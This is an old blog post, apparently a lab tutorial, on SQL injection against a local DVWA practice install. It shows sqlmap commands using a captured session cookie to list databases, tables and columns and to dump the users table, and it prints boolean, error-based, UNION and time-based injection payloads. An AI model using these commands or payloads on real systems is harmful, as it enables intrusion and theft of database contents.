Rabu, 01 Februari 2012

 SQL INJECTION WITH DVWA


DVWA open on localhost / dvwa in writing in the browser ..
once you start apache and mysql ...
then input your username and password when it is opened dvwa
upon entering you can choose DVWA scurity with recovered LOW
 
 then open the tamper data on the tool and run a web browser by clicking the Start tampe.




 then enter the number 1 and then submit. and after the tamper can stop searching for then click on the tamper

 on tamper we can see the cookie to be copied to the following shell


 and furthermore you can see the following instructions

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=pag22l1idbstdes8f0e3avq8h1" --string="Surname" --dbs
    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 03:55:56

[03:55:56] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[03:55:56] [INFO] resuming injection data from session file
[03:55:56] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:55:56] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://localhost:80/dvwa/login.php'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] y
[03:55:58] [INFO] testing if the provided string is within the target URL page content
[03:55:58] [WARNING] you provided 'Surname' as the string to match, but such a string is not within the target URL page content original request, sqlmap will keep going anyway
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5750=5750 AND 'qBpA'='qBpA&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 6077 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,118,117,58),(SELECT (CASE WHEN (6077=6077) THEN 1 ELSE 0 END)),CHAR(58,117,119,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pPqT'='pPqT&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,116,118,117,58),IFNULL(CAST(CHAR(110,104,111,74,115,119,119,120,89,106) AS CHAR),CHAR(32)),CHAR(58,117,119,121,58))# AND 'qobI'='qobI&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'HWkj'='HWkj&Submit=Submit
---

[03:55:58] [INFO] manual usage of GET payloads requires url encoding
[03:55:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[03:55:58] [INFO] fetching database names
[03:55:58] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': information_schema, dvwa, fbip, mysql
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql

[03:55:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 03:55:58

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=pag22l1idbstdes8f0e3avq8h1" -D dvwa --tables
    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 03:56:44

[03:56:44] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[03:56:44] [INFO] resuming injection data from session file
[03:56:44] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:56:44] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://localhost:80/dvwa/login.php'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5750=5750 AND 'qBpA'='qBpA&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 6077 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,118,117,58),(SELECT (CASE WHEN (6077=6077) THEN 1 ELSE 0 END)),CHAR(58,117,119,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pPqT'='pPqT&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,116,118,117,58),IFNULL(CAST(CHAR(110,104,111,74,115,119,119,120,89,106) AS CHAR),CHAR(32)),CHAR(58,117,119,121,58))# AND 'qobI'='qobI&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'HWkj'='HWkj&Submit=Submit
---

[03:56:46] [INFO] manual usage of GET payloads requires url encoding
[03:56:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[03:56:46] [INFO] fetching tables for database: dvwa
[03:56:46] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[03:56:46] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 03:56:46

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=pag22l1idbstdes8f0e3avq8h1" -T users --columns
    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 03:57:44

[03:57:45] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[03:57:45] [INFO] resuming injection data from session file
[03:57:45] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:57:45] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://localhost:80/dvwa/login.php'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5750=5750 AND 'qBpA'='qBpA&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 6077 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,118,117,58),(SELECT (CASE WHEN (6077=6077) THEN 1 ELSE 0 END)),CHAR(58,117,119,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pPqT'='pPqT&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,116,118,117,58),IFNULL(CAST(CHAR(110,104,111,74,115,119,119,120,89,106) AS CHAR),CHAR(32)),CHAR(58,117,119,121,58))# AND 'qobI'='qobI&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'HWkj'='HWkj&Submit=Submit
---

[03:57:47] [INFO] manual usage of GET payloads requires url encoding
[03:57:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[03:57:47] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) columns
[03:57:47] [INFO] fetching current database
[03:57:47] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa
[03:57:47] [INFO] fetching columns for table 'users' on database 'dvwa'
[03:57:47] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': user_id, int(6), first_name, varchar(15), last_name, varchar(15), user, varchar(15), password, varchar(32), avatar, varchar(70)
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+

[03:57:47] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 03:57:47

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=pag22l1idbstdes8f0e3avq8h1" -T users -C user_id --dump

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 03:58:08

[03:58:08] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[03:58:08] [INFO] resuming injection data from session file
[03:58:08] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[03:58:08] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'http://localhost:80/dvwa/login.php'. do you want to follow redirects from now on (or stay on the original page)? [Y/n] y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5750=5750 AND 'qBpA'='qBpA&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 6077 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,118,117,58),(SELECT (CASE WHEN (6077=6077) THEN 1 ELSE 0 END)),CHAR(58,117,119,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pPqT'='pPqT&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,116,118,117,58),IFNULL(CAST(CHAR(110,104,111,74,115,119,119,120,89,106) AS CHAR),CHAR(32)),CHAR(58,117,119,121,58))# AND 'qobI'='qobI&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'HWkj'='HWkj&Submit=Submit
---

[03:58:10] [INFO] manual usage of GET payloads requires url encoding
[03:58:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[03:58:10] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[03:58:10] [INFO] fetching current database
[03:58:10] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[03:58:13] [INFO] fetching columns LIKE 'user_id' for table 'users' on database 'dvwa'
[03:58:13] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': user_id, int(6)
[03:58:13] [INFO] fetching column(s) 'user_id' entries for table 'users' on database 'dvwa'
[03:58:13] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': 1, 2, 3, 4, 5
Database: dvwa
Table: users
[5 entries]
+---------+
| user_id |
+---------+
| 1       |
| 3       |
| 2       |
| 5       |
| 4       |
+---------+

[03:58:13] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[03:58:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 03:58:13
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)